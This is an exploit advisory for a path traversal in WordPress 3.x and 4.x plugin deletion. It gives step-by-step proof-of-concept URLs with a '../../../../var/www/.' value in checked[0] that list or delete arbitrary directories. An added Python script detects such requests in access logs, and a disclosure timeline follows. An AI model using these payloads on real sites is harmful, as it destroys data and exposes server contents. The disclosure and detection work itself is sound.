WordPress 3.x, 4.x Path Traversal + Directory Listing + File Deletion Vulnerabilities

######################

# Exploit Title : WordPress 3.x, 4.x Path Traversal + Directory Listing + File Deletion Vulnerabilities

# Exploit Author : Claudio Viviani

# Vendor Homepage : https://wordpress.org

# Software Link : http://wordpress.org/wordpress-3.9.2.tar.gz

# Date : 2014-07-11

# Tested on : Mozilla Firefox / WordPress 4.0 beta 1
#             Mozilla Firefox / WordPress 4.0 beta 2
#             Mozilla Firefox / WordPress 4.0 beta 3
#             Mozilla Firefox / WordPress 3.9.2
#             Mozilla Firefox / WordPress 3.9.1
#             Mozilla Firefox / WordPress 3.8
#             Mozilla Firefox / WordPress 3.7

######################

# Location : 
 
http://victim/wp-admin/plugins.php

######################

# Description :

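An admin user could list the contents of arbitrary directories, or delete writable directories, by placing a path traversal sequence in the checked[0] parameter of the plugin deletion request.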

######################

# PoC Path Traversal + Directory Listing

1) Choose a plugin

2) Click on "Deactivate" and "Delete" buttons

3) Replace the plugin location with the target directory in the URL.
   
   Example: http://localhost/wp-admin/plugins.php?action=delete-selected&checked[0]=../../../../var/www/.&plugin_status=all&paged=1&s&_wpnonce=1154979245

4) Click on the "Click to view entire list of files which will be deleted" link.



# PoC Path Traversal + File Deletion (WARNING!!! The directories selected will be deleted!!!)

1) Choose a plugin

2) Click on "Deactivate" and "Delete" buttons

3) Replace the plugin location with the target directory in the URL.
   
   Example: http://localhost/wp-admin/plugins.php?action=delete-selected&checked[0]=../../../../var/www/.&plugin_status=all&paged=1&s&_wpnonce=1154979245


4) Click on "Yes delete these files"
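
To find the request shape used in both PoCs above in web server logs, the following added example (not part of the original advisory) scans combined-format access log lines for plugins.php delete-selected requests whose checked[] values resolve outside the plugins directory. The log lines, the function names and the extra decoding pass are assumptions made for this illustration.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line of a combined-format log entry; checked[0], checked[] after decoding.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
CHECKED_RE = re.compile(r'^checked\[\d*\]$')


def escapes_plugin_dir(value):
    """True if a checked[] value resolves outside the plugins directory."""
    # Decode once more to catch double-encoded sequences such as %252e%252e.
    path = unquote(value).replace("\\", "/")
    if path.startswith("/"):
        return True
    normalized = posixpath.normpath(path)
    return normalized == ".." or normalized.startswith("../")


def suspicious_plugin_deletes(log_lines):
    """Return (line_number, offending_value) for traversal in plugin deletion."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/wp-admin/plugins.php"):
            continue
        params = parse_qsl(url.query, keep_blank_values=True)
        if ("action", "delete-selected") not in params:
            continue
        for name, value in params:
            if CHECKED_RE.match(name) and escapes_plugin_dir(value):
                hits.append((number, value))
    return hits


# Constructed sample log lines (not taken from a real server; NONCE is a placeholder).
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Aug/2014:10:00:09 +0000] "GET /wp-admin/plugins.php?action=delete-selected&checked[0]=../../../../var/www/.&plugin_status=all&paged=1&s&_wpnonce=NONCE HTTP/1.1" 200 9034',
    '10.0.0.5 - - [06/Aug/2014:10:00:15 +0000] "GET /wp-admin/plugins.php?action=delete-selected&checked%5B0%5D=akismet%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fuploads%2F. HTTP/1.1" 200 7011',
    '10.0.0.5 - - [06/Aug/2014:10:00:20 +0000] "GET /wp-admin/plugins.php?action=delete-selected&checked[0]=akismet/akismet.php HTTP/1.1" 200 4800',
]

if __name__ == "__main__":
    for number, value in suspicious_plugin_deletes(SAMPLE_LOG):
        print(f"line {number}: traversal in checked[] -> {value!r}")
```

Access logs record only the query string, so the same parameters submitted in a POST body have to be inspected at a WAF or inside the application instead.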



# PoC video is available at:

https://www.youtube.com/watch?v=yVtIA82ZJuA


######################

# Vulnerability Disclosure Timeline:

2014-07-10:  Discovered vulnerability
2014-07-10:  Vendor Notification (WordPress Security e-mail address)
2014-07-10:  Vendor Response/Feedback (Andrew Nacin - Lead Developer WordPress)
2014-08-06:  3.9.2 has been released, but the vulnerability is not fixed
2014-08-06:  Public Disclosure 


#####################

Discovered By : Claudio Viviani
               http://www.homelab.it
        
               info@homelab.it
               homelabit@protonmail.ch

               https://www.facebook.com/homelabit
               https://twitter.com/homelabit
               https://plus.google.com/+HomelabIt1/
               https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################